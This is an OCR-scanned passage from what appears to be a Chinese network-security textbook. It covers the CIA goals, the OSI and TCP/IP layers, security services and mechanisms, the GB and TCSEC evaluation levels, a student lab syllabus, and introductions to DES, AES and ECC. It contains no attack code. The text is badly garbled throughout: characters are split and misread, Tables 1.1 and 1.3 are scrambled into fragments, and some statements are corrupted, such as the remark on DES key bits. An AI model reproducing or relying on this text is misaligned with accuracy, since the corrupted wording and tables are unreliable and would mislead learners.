性 ,不 存在 被 泄露 更 改 和 破坏 的 风险 。 网 络 系统 的 信息 安全 目标 包括 以 下 几 点 。 
。 保密 性 (confidentiality): 防止 信息 的 非 授权 访问 或 泄露 。 信 息 只 限于 授权 用 户 
使 用 ,保密 性 主要 通过 信息 加 密 、 身 份 认证 ,访问 控制 .安全 通信 协议 等 技术 实现 ， 
信息 加 密 是 防止 信息 非法 泄露 的 最 基本 手段 。 
。 完整 性 (integrity) : 保证 信息 不 会 被 非法 改动 和 销毁 。 保 密 性 强调 信息 不 能 非法 
泄露 ,而 完整 性 强调 信息 在 存储 和 传输 过 程 中 不 能 被 偶然 或 蓄意 修改 、 删 除 、 伪 
造 、 添 加 、 破 坏 或 丢失 ,信息 在 存储 和 传输 过 程 中 必须 保持 原样 。 信 息 完整 性 表明 
了 信息 的 可 靠 性 、 正 确 性 .有效 性 和 一 致 性 ,只 有 完整 的 信息 才 是 可 信任 的 信息 。 
* 可 用 性 (availability) : 保证 网 络 资源 随时 可 被 合法 用 户 访问 ,是 信息 资源 容许 授 
权 用 户 按 需 访问 的 特性 。 
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* 有 效 性 : 是 信息 系统 面向 用 户 服务 的 安全 特性 。 信 息 系 统 只 有 持续 有 效 , 授 权 用 
户 才能 随时 随地 根据 自己 的 需要 访问 信息 系统 提供 的 服务 。 

完整 的 网 络 信息 安全 体系 至 少 应 包括 三 类 措施 : 

。 社会 的 法 律 政策 .安全 的 规章 制度 以 及 安全 教育 等 外 部 软环境 。 

。 技术 方面 的 措施 ,如 防火 墙 技术 .网络 防毒 .信息 加 密 存 储 与 通信 、 身 份 验证 、 授 

权 等 。 

。 审计 和 管理 措施 ,同时 包含 了 技术 与 社会 措施 。 

保证 网 络 安全 的 技术 手段 主要 包括 以 下 几 种 。 

。 信息 加 密 : 数据 传输 加 密 .数据 存储 加 密 ,数据 完整 性 鉴别 和 密 钥 管理 。 

。 身份 验证 和 授权 管理 : 实体 访问 控制 .数据 访问 控制 。 

。 安全 防御 : 防火 墙 技术 、 防 病毒 技术 ;网 络 介质 和 通信 和 链 路 的 保护 。 

。 安全 审计 和 管理 : 网 络 实时 监控 .安全 策略 审计 和 漏洞 扫描 。 

1.2.2 网 络 安全 体系 结构 

当前 ,通用 的 网 络 层次 标准 有 OSI 和 TCP/IP 两 种 。OSI 是 理论 标准 ;TCP/IP ЖТ. 
业 的 事实 标准 。 由 于 不 同 的 局 域 网 有 不 同 的 网 络 协议 ,为 了 使 不 同 的 网 络 能 够 互联 ,必须 
建立 统一 的 网 络 互联 协议 。 为 此 ,ISO( 国 际 标准 化 组 织 ) 提 出 了 网 络 互联 协议 的 基本 框 
架 , 称 为 开放 系统 互 连 (OSIT) 参 考 模型 。 它 将 整个 网 络 的 功能 划分 为 七 个 层次 (如 表 1.1 
所 示 )。 应 用 层 、 表 示 层 、 会 话 层 、 传 输 层 被 归 为 高 层 ;而 网 络 层 .数据 链 路 层 、. 物 理 层 被 归 
为 低层 。 高 层 负 责 主机 之 间 的 数据 传输 ;低层 负责 网 络 数据 传输 。 

表 1.1 网 络 体系 层次 

OSI 模型 主要 功能 常见 协议 JTCP/IP 网 络 主要 功能 常见 协议 
应 用 层 提供 应 用 程序 间 的 通信 | HTTP、FTP 
表示 层 数据 格式 .数据 加 密 NBSSL,LPP | 应 用 层 
会 话 层 建立 .维护 .管理 会 话 RPC,LDAP 
传输 层 建立 主机 端 到 端 连 接 TCP、UDP | 传输 层 建立 端 到 端 连 接 | TCP.UDP 


提供 应 用 程序 


接口 HTTP.FTP 


网 络 层 寻 址 和 路 由 选择 IP ICMP 互联 网 层 “| 寻 址 和 路 由 选择 | IP ICMP 
数据 链 路 层 | 介质 访问 和 链 路 管理 “| PPP 二 进 制 数据 流传 

网 络 接口 层 | 输 和 物理 介质 | PPP 
物理 层 比特 流传 输 访问 


层 与 层 之 间 的 联系 是 通过 各 层 之 间 的 接口 来 进行 的 ,上 层 通过 接口 向 下 层 提 出 服务 
请 求 , 而 下 层 通过 接口 向 上 层 提供 服务 。 除 物理 层 之 外 ,各 对 等 层 之 间 均 不 存在 直接 的 通 
信和 关系 ,而 是 通过 各 对 等 层 之 间 的 通信 协议 来 进行 通信 ;只 有 两 物理 层 之 间 通 过 传输 介质 
进行 真正 的 数据 通信 。 

1.2.2.1 OSI 参考 模型 

OSI 参考 模型 是 研究 .设计 新 的 计算 机 网 络 系统 和 评估 改进 现 有 系统 的 理论 依据 ， 
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是 理解 和 实现 网 络 安全 的 基础 。 在 OSI 参考 模型 中 主要 包括 安全 服务 (security 
service) ,安全 机 制 (security mechanism) 和 安全 管理 (security management) 。 

网 络 的 安全 服务 包括 以 下 内 容 。 

。 对 等 实体 认证 服务 : 实体 的 合法 性 、 真 实 性 确认 。 

。 访问 控制 服务 : 防止 对 任何 资源 的 非 授权 访问 。 

。 数据 保密 服务 : 加 密 保护 ,防止 被 截获 的 数据 泄密 。 

。 数据 完整 性 服务 : 使 消息 的 接收 者 能 够 发 现 消息 是 否 被 修改 ,是 否 被 攻击 者 用 假 

消息 换 掉 。 

。 数据 源 点 认证 服务 : 数据 来 自 真正 的 源 点 ,以 防 假冒 。 

* 信息 流 安 全 服务 : 通过 流量 填充 阻止 非法 流量 分 析 。 

。 不 可 否认 服务 : 防止 对 数据 源 以 及 数据 提交 的 否认 。 

为 了 实现 这 些 安全 服务 ,需要 一 系列 安全 机 制作 为 支撑 ,如 下 所 示 。 

。 加 密 机 制 : 应 用 现代 密码 学 理论 ,确保 数据 的 机 密 性 。 

。 数字 签名 机 制 : 保证 数据 完整 性 和 不 可 否认 性 。 

。 访问 控制 机 制 : 与 实体 认证 相关 , 且 要 牺牲 网 络 性 能 。 

。 数据 完整 性 机 制 : 保证 数据 在 传输 过 程 中 不 被 非法 入 侵 算 改 。 

。 认证 交换 机 制 : 实现 站 点 、 报 文 .用 户 和 进程 认证 等 。 

。 流量 填充 机 制 : 针对 流量 分 析 攻 击 而 建立 的 机 制 。 

。 路 由 控制 机 制 : 可 以 指定 数据 通过 网 络 的 路 径 。 

。 公 证 机 制 : 用 数字 签名 技术 由 第 三 方 来 提供 公正 仲裁 。 

1.2.2.2 网 络 安全 控制 系统 

通过 对 网 络 应 用 的 全 面 了 解 ,按照 安全 风险 ,需求 分 析 结 果 、 安 全 策略 以 及 安全 目标 ， 
安全 控制 系统 可 以 分 为 物理 安全 .系统 安全 网络 安全 应 用 安全 ,管理 安全 等 几 个 方面 。 

1, 物理 安全 

物理 安全 是 保障 整个 网 络 系统 安全 的 前 提 , 保 护 计算 机 网 络 的 物理 通路 不 被 损坏 .不 
被 窃听 以 及 不 被 攻击 和 干扰 。 它 包括 三 个 方面 : 环境 安全 .设备 安全 、 媒 体 安全 。 防 范 措 
施 包括 : 对 重要 信息 存储 ,收发 部 门 进行 屏蔽 处 理 , 防 止 信号 外 泄 ; 对 局 域 网 传输 线路 传 
输 辐射 的 抑制 ;对 终端 设备 辐射 的 防范 。 

2. 系统 安全 

系统 安全 包括 网 络 结构 安全 、 操 作 系 统 安全 和 应 用 系统 安全 。 网 络 结构 安全 指 网 络 
拓扑 结构 是 否 合理 ,线路 是 否 有 宛 余 ,路 由 是 否 元 余 ,防止 单 点 失败 等 。 安 全 防范 策略 包 
括 : 尽量 采用 安全 性 较 高 的 网 络 操作 系统 并 进行 必要 的 安全 配置 ;关闭 不 常用 却 存在 安 
全 隐患 的 应 用 ;对 保存 有 用 户 信 息 及 其 口令 的 关键 文件 使 用 权限 进行 严格 限制 ;通过 配备 
安全 扫描 系统 对 操作 系统 进行 安全 性 扫描 ,及 时 发 现 安全 漏洞 :应 用 服务 器 应 关闭 一 些 不 
经 常 使 用 的 协议 及 协议 端口 号 ,加 强身 份 认证 ,严格 限制 登录 者 的 操作 权限 。 

3. 网 络 安全 

网 络 安全 是 整个 安全 解决 方案 的 关键 ,通过 访问 控制 .通信 保密 ,入侵 检测 .网络 安 全 
扫描 系统 、 防 病毒 工具 等 措施 保障 。 隔 离 与 访问 控制 可 通过 严格 的 管理 制度 划分 虚拟 子 
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网 (VLAN) .配备 防火 墙 来 进行 ;防火 墙 是 实现 网 络 安全 最 基本 、 最 经 济 、 最 有 效 的 安全 措 
施 之 一 , 它 通过 制定 严格 的 安全 策略 实现 内 外 网 络 或 内 部 网 络 不 同 信 任 域 之 间 的 隔离 与 
访问 控制 ;通信 保密 使 得 数据 以 密 文 形式 在 网 络 上 传输 ,可 以 选择 链 路 层 加 密 和 网 络 层 加 
密 等 方式 ;人 侵 检 测 是 根据 已 有 攻击 手段 的 信息 代码 对 所 有 网 络 操 作 行为 进行 实时 监控 、 
记录 ,并 按 制定 的 策略 予以 响应 ,从 而 防止 针对 网 络 的 攻击 与 犯罪 行为 ;网 络 安 全 扫描 系 
统 可 以 对 网 络 中 所 有 部 件 (Web 站 点 、 防 火 墙 . 路 由 器 ,TCP/IP 及 相关 协议 服务 ) 进 行 攻 
击 性 扫描 、 分 析 和 评估 ,发 现 并 报告 系统 存在 的 弱点 和 漏洞 ,评估 安全 风险 ,提出 补救 措 
Jit ;病毒 防护 也 是 网 络 安全 建设 的 重要 环节 之 一 , 反 病 毒 技 术 包括 预防 病毒 .检测 病毒 和 
杀毒 三 种 技术 。 

4. 应 用 安全 

应 用 安全 表现 在 内 部 网 络 系统 中 资源 共享 和 信息 存储 等 方面 。 严 格 控制 内 部 员工 对 
网 络 共享 资源 的 使 用 ,在 内 部 子 网 中 一 般 不 开放 共享 目录 ,对 有 经 常 交 换 信息 需求 的 用 
P ,在 共享 时 必须 加 装 口令 认证 机 制 。 对 数据 库 服务 器 中 的 数据 库 必 须 做 安全 备份 ,通过 
网 络 备份 系统 ,也 可 以 进行 远程 备份 存储 。 

5. 安全 管理 

通过 制定 健全 的 安全 管理 体制 .构建 安全 管理 平台 、 增 强人 员 的 安全 防范 意识 ,是 网 
络 安全 得 以 实现 的 重要 保证 ;应 经 常 对 人 员 进 行 网 络 安全 防范 意识 的 培训 ,全 面 提 高 人 员 
的 网 络 安全 防范 意识 ;组 建安 全 管理 子 网 ,安装 集中 统一 的 安全 管理 软件 ,如 病毒 软件 管 
理 系统 、 网 络 设备 管理 系统 以 及 网 络 安全 设备 统一 管理 软件 ,通过 安全 管理 平台 实现 全 网 
的 安全 管理 。 


1.2.2.3 安全 体系 设计 

安全 体系 设计 原则 包括 以 下 几 个 方面 : 

CD 需求 .风险 、 代 价 平衡 分 析 的 原则 。 对 任 一 网 络 来 说 ,绝对 安全 难以 达到 。 要 进 
行 实际 分 析 , 对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 相 结 合 的 分 析 , 制 定 规 
范 和 措施 ,确定 系统 安全 策略 。 

(2) 一 致 性 原则 。 一 致 性 原则 是 指 网 络 安全 问题 应 与 网 络 的 生命 周期 并 存 , 制 定 的 
安全 体系 结构 必须 与 网 络 的 安全 需求 相 一 致 。 

(3) 易 操作 性 原则 。 安 全 措施 要 具有 便利 性 和 可 操作 性 ,考虑 管理 人 员 的 自身 素质 ， 
对 操作 人 员 的 要 求 不 宜 过 高 。 

1.2.2.4 网 络 安全 策略 

网 络 安全 策略 应 考虑 安全 管理 策略 和 安全 技术 实施 策略 两 个 方面 。 

CD 管理 策略 。 即 使 是 最 好 的 、 最 值得 信赖 的 系统 安全 措施 ,也 不 能 完全 由 计算 机 系 
统 来 独立 完成 ,需要 建立 完备 的 安全 组 织 和 管理 制度 ,以 约束 操作 人 员 。 

(2) 技术 策略 。 要 针对 网 络 .操作 系统 数据库、 信息 共享 授权 提出 具体 的 措施 。 

计算 机 信息 系统 的 安全 管理 主要 基于 三 个 原则 , 即 多 人 负责 原则 、 任 期 有 限 原 则 、 职 
责 分 离 原 则 。 由 于 网 络 互联 在 链 路 层 、 网 络 层 、 传 输 层 、 应 用 层 等 不 同 协议 层 均 有 体现 , 且 
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各 个 层 的 功能 和 安全 特性 不 同 ,因而 其 网 络 安全 措施 也 不 相同 。 

物理 层 安全 涉及 传输 介质 的 安全 特性 , 抗 干 扰 、 防 窃听 是 物理 层 安 全 措施 制定 的 
点 。 

在 链 路 层 , 可 以 通过 建立 虚拟 局 域 网 ,对 物理 和 逮 辑 网 段 进行 有 效 的 分 割 和 隔离 , 消 
除 不 同安 全 级 别 逻 辑 网 段 间 的 窃听 风险 。 

在 网 络 层 , 可 通过 对 不 同 子 网 的 定义 和 对 路 由 器 的 路 由 表 控 制 来 限制 子 网 间 的 通信 ; 

同时 ,利用 网 关 的 安全 控制 能 力 ,限制 节点 的 通信 和 应 用 服务 ,加 强 对 外 部 用 户 的 识别 和 
验证 能 力 。 


1.2.3 网 络 安全 评价 标准 


评价 标准 中 比较 流行 的 是 1985 年 美国 国防 部 制定 的 可 信任 计算 机 标准 评价 准则 ,各 
国 根据 自己 的 国情 也 都 制定 了 相关 的 标准 。 


1.2.3.1 中 国 评价 标准 

在 我 国 ,1999 年 10 月 经 过 国家 质量 技术 监督 局 批准 发 布 的 (计算 机 信息 系统 安全 保 
护 等 级 划分 准则 ) 将 计算 机 安全 保护 划分 为 以 下 五 个 级 别 : 

第 1 级 为 用 户 自主 保护 级 (GB1 安全 级 ) , 它 的 安全 保护 机 制 使 用 户 具备 自主 安全 保 
护 的 能 力 ,保护 用 户 的 信息 免 受 非法 的 读 写 破坏 。 

第 2 级 为 系统 审计 保护 级 (GB2 安全 级 ) , 除 具 备 第 一 级 所 有 的 安全 保护 功能 外 ,要 
求 创建 和 维护 访问 的 审计 跟踪 记录 ,使 所 有 的 用 户 对 自己 的 行为 的 合法 性 负责 。 

第 3 级 为 安全 标记 保护 级 (GB3 安全 级 ) , 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 
以 访问 对 象 标记 的 安全 级 别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

第 4 级 为 结构 化 保护 级 (GB4 安全 级 ) ,在 继承 前 面 安全 级 别 安全 功能 的 基础 上 ,将 
安全 保护 机 制 划 分 为 关键 部 分 和 非 关键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 
存 取 ,从 而 加 强 系统 的 抗 渗透 能 力 。 

第 5 级 为 访问 验证 保护 级 (GB5 安全 级 ), 这 一 级 别 特别 增设 了 访问 验证 功能 ,负责 
仲裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 

从 20 世纪 80 年 代 中 期 开始 ,我 国 自主 制定 和 采用 了 一 批 相 应 的 信息 安全 标准 。 但 
是 ,应 该 承认 ,标准 的 制定 需要 较为 广泛 的 应 用 经 验 和 较为 深入 的 研究 背景 。 这 两 方面 的 
差距 ,使 我 国 的 信息 安全 标准 化 工作 与 国际 已 有 的 工作 相 比 ,覆盖 的 范围 还 不 够 大 ,宏观 
和 微观 的 指导 作用 也 有 待 进一步 增强 。 


1.2.3.2 国际 评价 标准 
美国 国防 部 开发 的 计算 机 安全 标准 一 一 可 信任 计算 机 标准 评价 准则 (Trusted 
Computer Standards Evaluation Criteria,TCSEC), 即 网 络 安全 检 皮 书 , 自 从 1985 年 成 为 
美国 国防 部 的 标准 以 来 ,一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 其 他 子 系 
统 ( 如 数据 库 和 网 络 ) 也 一 直 用 桂皮 书 来 解释 评估 。 柳 皮 书 把 安全 的 级 别 从 低 到 高 分 成 四 
个 类 别 : D 类 、C 类 、B 类 和 A 类 ,每 类 又 分 几 个 级 别 , 如 表 1. 2 所 示 。 
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表 1.2 网 络 安全 评价 级 别 


类 别 级 别 名 称 主要 特征 
D D 低级 保护 没有 安全 保护 
| C1 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控制 ,安全 标识 
B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
安全 区 域 存 取 监控 ,高 抗 渗透 能 力 
A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 


D 级 是 最 低 的 安全 级 别 , 拥 有 这 个 级 别 的 操作 系统 就 像 一 个 门户 大 开 的 房子 ,任何 人 
都 可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,没有 任何 保护 措施 ,操作 系统 容易 
受到 损害 ,没有 系统 访问 限制 和 数据 访问 限制 ,任何 人 不 需 任何 账户 都 可 以 进入 系统 , 访 
问 他 人 的 数据 文件 不 受 任何 限制 。 属 于 这 个 级 别 的 操作 系统 有 DOS 和 Windows 98 等 。 

Cl1 是 C 类 的 一 个 安全 子 级 。C1 又 称 选 择 性 安全 保护 (discretionary security 
protection) 系 统 , 它 描述 了 一 个 典型 的 用 在 UNIX 系统 上 的 安全 级 别 。 这 种 级 别 的 系统 
对 硬件 有 某 种 程度 的 保护 ,如 用 户 拥 有 注册 账号 和 口令 ,系统 通过 账号 和 口令 来 识别 用 户 
是 否 合法 ,并 决定 用 户 对 程序 和 信息 拥有 何 种 访问 权限 ,但 硬件 受到 损害 的 可 能 性 仍然 
存在 。 

C2 级 除了 包含 СТ 级 的 特征 外 ,还 具有 访问 控制 环境 (controlled access environment) ft 
力 , 即 具有 进一步 限制 用 户 执行 某 些 命令 或 者 访问 某 些 文件 的 权限 ,而 且 还 加 入 了 身份 认 
证 等 级 。 另 外 ,系统 对 事件 进行 审计 ,并 写 入 日 志 中 ,如 何 时 开机 ,用 户 在 何 时 何 地 登录 系 
统 等 ,通过 查看 日 志 , 就 可 以 发 现 人 侵 痕 迹 。 审 计 除 了 可 以 记录 下 系统 管理 员 执 行 的 活动 
以 外 ,还 加 入 了 身份 认证 级 别 ,缺点 在 于 它 需 要 额外 的 处 理 时 间 和 磁盘 空间 。 

使 用 附加 身份 验证 就 可 以 让 一 个 C2 级 系统 用 户 在 不 是 超级 用 户 的 情况 下 有 权 执 行 
系统 管理 任务 。 授 权 分 级 使 系统 管理 员 能 够 给 用 户 分 组 ,授予 他 们 访问 某 些 程序 的 权限 
或 访问 特定 的 目录 。 能 够 达到 C2 级 别 的 常见 操作 系统 有 UNIX 系统 、Novell 3.X 或 者 
更 高 版 本 、Windows NT, Windows 2000 和 Windows 2003, 

B 级 中 有 三 个 级 别 。B1l 级 即 标志 安全 保护 (labeled security protection) ,是 支持 多 级 
安全 (例如 秘密 和 绝密 ) 的 第 一 个 级 别 ,这 个 级 别 说 明 处 于 强制 性 访问 控制 之 下 的 对 象 , 系 
统 不 允许 文件 的 拥有 者 改变 其 许可 权限 。 这 种 安全 级 别 的 计算 机 系统 一 般 在 政府 机 构 
中 ,比如 国防 部 和 国家 安全 局 的 计算 机 系统 。 

B2 级 又 叫 结构 保护 (structured protection) 5 9] , 它 要 求 计 算 机 系统 中 所 有 的 对 象 都 
要 加 上 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 者 多 个 安全 级 别 。 

B3 级 又 叫 安全 域 (security domain) 级 别 ,使 用 安装 硬件 的 方式 来 加 强 域 的 安全 , 例 
如 ,内 存 管理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 别 也 
要 求 用 户 通过 一 条 可 信任 途径 连接 到 系统 上 。 
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А 级 又 称 验证 设计 (verified design) 级 别 , 是 当前 橙 皮 书 的 最 高 级 别 , 它 包含 了 一 个 
严格 的 设计 、 控 制 和 验证 过 程 。 安 全 级 别 设计 必须 从 数学 角度 上 进行 验证 ,而 且 必 须 进行 
秘密 通道 和 可 信任 分 布 分 析 。 

可 信任 分 布 (trusted distribution) fg & FE: 硬件 和 软件 在 物理 传输 过 程 中 受到 保 
护 ,以 防止 破坏 安全 系统 。 


1.2.4 信息 安全 定义 


信息 安全 是 指 信 息 网 络 的 硬件 .软件 及 其 系统 中 的 数据 受到 保护 , 免 受 破坏 .更 改 和 
泄露 ,系统 连续 可 靠 正 常 地 运行 ,信息 服务 不 中 断 。 信 息 安 全 是 一 门 涉及 计算 机 科学 、 网 
络 技术 .通信 技术 、 密 码 技术 .信息 安全 技术 .应 用 数学 ,数论 .信息论 等 多 种 学 科 的 综合 性 
学 科 。 

随 着 信息 安全 技术 的 发 展 , 经 历 了 从 基本 安全 隔离 .主机 加 固 阶段 ,到 后 来 的 网 络 认 
证 阶段 ,直到 将 行为 监控 和 审计 也 纳入 安全 的 范畴 。 这 样 的 演变 不 仅仅 是 为 了 避免 恶意 
攻击 ,更 重要 的 是 为 了 提高 网 络 的 可 信和 度 。 

信息 安全 的 内 涵 在 不 断 的 延伸 ,从 最 初 的 信息 保密 性 发 展 到 信息 的 完整 性 .可 用 性 、 
可 控 性 和 不 可 否认 性 ,进而 又 发 展 为 * 攻 (攻击 )、 防 (防范 )、 测 (检测 )、 控 (控制 )、 管 ( 管 
Jill) . 评 ( 评 估 )” 等 多 方面 的 基础 理论 和 实施 技术 。 

从 广义 上 讲 , 凡 是 涉及 网 络 上 信息 的 保密 性 .完整 性 .可 用 性 真实 性 和 可 控 性 的 相关 
技术 和 理论 都 是 网 络 安全 的 研究 领域 。 目 前 常用 的 基础 性 安全 技术 包括 以 下 内 容 。 

。 身份 认证 技术 : 用 来 确定 用 户 或 者 设备 身份 的 合法 性 ,典型 的 手段 有 口令 、 身 份 

识别 .PKI 证 书 和 生物 认证 等 。 

。 加 解密 技术 : 在 传输 过 程 或 存储 过 程 中 进行 信息 数据 的 加 解密 ,典型 的 加 密 体制 

有 对 称 加 密 和 非 对称 加 密 。 

。 边界 防 护 技 术 : 防止 外 部 网 络 用 户 以 非法 手段 进入 内 部 网 络 , 保 护 内 部 网 络 操作 
环境 ,典型 的 设备 有 防火 墙 和 入 侵 检 测 设备 。 
访问 控制 技术 : 保证 网 络 资源 不 被 非法 使 用 和 访问 。 访 问 控制 是 网 络 安全 防范 
和 保护 的 主要 核心 策略 ,在 身份 识别 的 基础 上 ,根据 身份 对 提出 资源 访问 的 请 求 
加 以 权限 控制 。 

。 主机 加 固 技术 : 主机 加 固 技术 对 操作 系统 数据库 等 进行 漏洞 加 固 和 保护 ,提高 

系统 的 抗 攻击 能 力 。 

。 安全 审计 技术 : 包含 日 志 审 计 和 行为 审计 。 通 过 日 志 审 计 协 助 管理 员 评 估 网 络 

配置 的 合理 性 .安全 策略 的 有 效 性 ;通过 对 用 户 的 网 络 行为 审计 ,确认 行为 的 合 规 
性 ,确保 管理 的 安全 。 

随 着 信息 网 络 的 不 断 普及 ,网 络 攻击 手段 也 在 不 断 复 杂 化 、 多 样 化 , 随 之 产生 的 信息 
安全 技术 和 解决 方案 也 在 不 断 发 展 变化 ,安全 产品 和 解决 方案 也 更 趋 于 合理 化 .适用 化 。 
经 过 多 年 的 发 展 ,安全 防御 体系 已 由 “被 动 防范 ”向 “主动 防御 ”发 展 ,由 “保护 网 络 ” 向 “ 保 
护 资 产 ” 过 渡 , 并 逐步 构建 出 具有 可 防 、 可 控 、 可 信 特点 的 信息 网 络 架 构 。 
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1.3 网 络 安全 实验 基本 要 求 


1. 实验 目的 


通过 网 络 安全 实验 使 学 生 掌 握 网 络 安全 技术 的 基本 概念 、 原 理 和 技术 ,了 解 基本 的 网 
络 安全 攻防 技术 、 常 用 工具 的 使 用 方法 及 原理 ,加 深 对 课堂 理论 教学 的 理解 ,培养 学 生 的 
实验 技能 、 动 手 能 力 和 分 析 问 题解 决 问题 的 能 力 。 


2. 实验 要 求 


通过 本 实验 的 学 习 , 学 生 应 达到 以 下 基本 要 求 : 
CD 了 解 计算 机 网 络 安全 的 重要 性 以 及 相关 的 法 律 法 规 ,建立 网 络 安全 意识 。 

(2) 掌握 计算 机 网 络 安全 方面 的 基本 技术 ,能 对 系统 的 安全 问题 做 出 相应 对 策 。 
(3) 掌握 网 络 安全 的 防范 技术 和 防 计算 机 病毒 技术 。 


з. 实验 内 容 


本 实验 所 规划 的 实验 项 目 内 容 、 学 时 分 配 、 实 验 类 型 及 综合 要 求情 况 如 表 1. 3 所 示 。 


表 1.3 实验 项 目 建议 内 容 


序号 | 基本 实验 内 容 | 建议 学 时 内 容 提要 实验 类 型 | ”实验 要 求 
| | 网 络 分 析 器 应 Р 熟悉 并 熟练 运用 网 络 分 析 器 ,能 够 ay, | 撰写 网 络 分 析 
用 实验 对 局 域 网 的 数据 进行 分 析 WATE | 测试 分 析 报 告 
。 | 剖析 远程 控制 了 解 远程 控制 的 基本 原理 ,熟悉 远 | | 编写 一 个 远程 
程序 程控 制 软件 的 使 用 ORES) 控制 程序 
з | SSL、VPN 应 T TW SSL,VPN 技术 及 其 构建 网 络 | 综合 性 | 利用 VPN 技术 
用 与 实践 安全 防护 的 基本 机 制 与 模式 | 实现 远程 访问 
熟悉 防火 墙 基本 知识 ,了 解 防 火 墙 ны 
4 | 防火 墙 技术 г | 的 具体 使 用 ,熟悉 防火 二 配置 规则 ,| 综合 性 | BUF BRE 
掌握 防火 墙 的 基本 原理 和 作用 " 
。 | 入侵 检测 系统 К 了 解 入侵 检测 系统 ,熟悉 入侵 检测 | Lou | 撰写 入 侵 检测 
” | 分 析 与 应 用 软件 的 使 用 SM 系统 应 用 报告 
6 | HEL ME ME A Br { 掌握 虚拟 蜜 网 的 定义 ` 结 构 及 具体 „ы | 利用 蜜 网 分 析 
与 实践 搭建 环境 和 步骤 “н 网 络 访问 行为 
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第 2 音 网 络 安 全 研究 内 


E: 


2.1 密码 技术 
2.1.1 基本 概念 


密码 学 (cryptology) 一 词 是 由 希腊 字 根 “隐藏 "(Krypt6s) 及 “信息 ”(l6gos) 组 合 而 成 ， 
泛 指 一 切 关于 研究 密码 通信 的 研究 内 容 。 密 码 具有 信息 加 密 、 可 鉴别 性 、 完 整 性 、 抗 抵赖 
性 等 作用 。 密 码 学 是 研究 编制 密码 和 破译 密码 的 技术 科学 。 研 究 密 码 变 化 的 客观 规律 ， 
应 用 于 编制 密码 以 保守 通信 秘密 的 , 称 为 编码 学 ;应 用 于 破译 密码 以 获取 通信 情报 的 , 称 
为 破译 学 。 编 码 学 和 破译 学 总 称 密码 学 。 

密码 是 通信 双方 按 约定 的 法 则 进行 信息 特殊 变换 的 一 种 重要 保密 手段 。 依 照 这 些 法 
则 , 变 明 文 为 密 文 , 称 为 加 密 变 换 ; 变 密 文 为 明文 , 称 为 解密 变换 。 密 码 在 早期 仅 对 文字 或 
数码 进行 加 、 解 密 变 换 , 随 着 通信 技术 的 发 展 , 对 语音 .图像 ,数据 等 都 可 实施 加 、 解 密 变 
换 。 密 码 学 是 在 编码 与 破译 的 斗争 实践 中 逐步 发 展 起 来 的 ,并 随 着 先进 科学 技术 的 应 用 ， 
已 成 为 一 门 综合 性 的 尖端 技术 科学 。 

密码 体制 也 称 为 密码 系统 ,是 指 能 完整 地 解决 信息 安全 性 中 机 密 性 、 数 据 完整 性 、 认 
证 .身份 识别 .可 控 性 及 不 可 抵赖 性 等 问题 中 的 一 个 或 者 多 个 的 完整 系统 。 对 一 个 密码 体 
制 的 正规 描述 ,需要 用 数学 方法 清楚 地 描述 其 中 的 各 种 对 象 .参数 .解决 问题 所 使 用 的 算 


2.1.2 密码 算法 


在 网 络 安全 领域 常见 的 加 密 算法 有 以 下 几 种 。 

1, DES 算法 

DES 算法 属于 密码 体制 中 的 对 称 密码 体制 ,又 被 称 为 美国 数据 加 密 标准 ,是 1972 年 
美国 IBM 公司 研制 的 对 称 密码 体制 加 密 算 法 。 其 密 钥 长 度 为 56 位 ,明文 按 64 位 进行 分 
组 ,将 分 组 后 的 明文 根据 56 位 的 密 钥 按 位 奉 代 或 交换 的 方法 形成 密 文 。 

算法 特点 : 分 组 较 短 , 密 钥 太 短 ,密码 生命 周期 短 , 运 算 速 度 较 慢 。DES 的 入 口 参数 
有 三 个 : Key,Data,Mode. Key 为 加 密 解 密使 用 的 密 钥 ;Data 为 加 密 解 密 的 数据 ; Mode 
为 其 工作 模式 。 当 工作 模式 为 加 密 模式 时 ,明文 按照 64 位 进行 分 组 ,形成 明文 组 ,Key 用 
于 对 数据 加 密 ; 当 工作 模式 为 解密 模式 时 ,Key 用 于 对 数据 解密 。 实 际 应 用 中 , 密 钥 只 用 
到 了 64 位 中 的 56 位 ,这 样 才 具 有 高 的 安全 性 。 

2. AES(advanced encryption standard, 高 级 加 密 标准 ) 算 法 

AES 算法 是 下 一 代 的 加 密 算法 标准 ,速度 快 ,安全 级 别 高 。2000 年 10 月 ,NIST( 美 
国 国 家 标准 和 技术 协会 ) 从 15 种 候选 算法 中 选 出 AES 算法 作为 新 的 密 钥 加 密 标准 。 
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AES 算法 正 日 益 成 为 电子 数据 加 密 的 实际 标准 。 

AES 是 一 个 迭代 的 、 对 称 密 钥 分 组 的 密码 , 它 可 以 使 用 128 位 、192 位 和 256 位 密 钥 ， 
并 且 用 128 位 (16 字 节 ) 分 组 加 密 和 解密 数据 。AES 算法 基于 排列 和 置换 运算 ,该 算法 利 
用 分 组 密码 返回 的 加 密 数 据 的 位 数 与 输入 数据 相同 的 特点 ,使 用 循环 结构 进行 迭代 加 密 ， 
在 该 循环 中 重复 置换 和 替换 输入 数据 。 

3. ECC 算法 

ECC 算法 又 称 椭圆 曲线 加 密 系统 ,是 目前 已 知 的 所 有 公 钥 密码 体制 中 能 够 提供 最 高 
比特 强度 的 一 种 公 钥 体制 。 

椭圆 曲线 密码 体制 具有 以 下 优点 : 

(1) 用 椭圆 曲线 来 构造 密码 体制 ,用 户 可 以 任意 地 选择 安全 的 椭圆 曲线 ,在 确定 了 有 
限 域 后 ,椭圆 曲线 的 选择 范围 很 大 。 

(2) 一 旦 选择 恰当 的 椭圆 曲线 ,就 没有 有 效 的 指数 算法 来 攻击 它 。 


2.1.3 网 络 安全 应 用 


密码 学 在 网 络 安全 中 的 具体 应 用 主要 包括 以 下 几 种 形式 。 

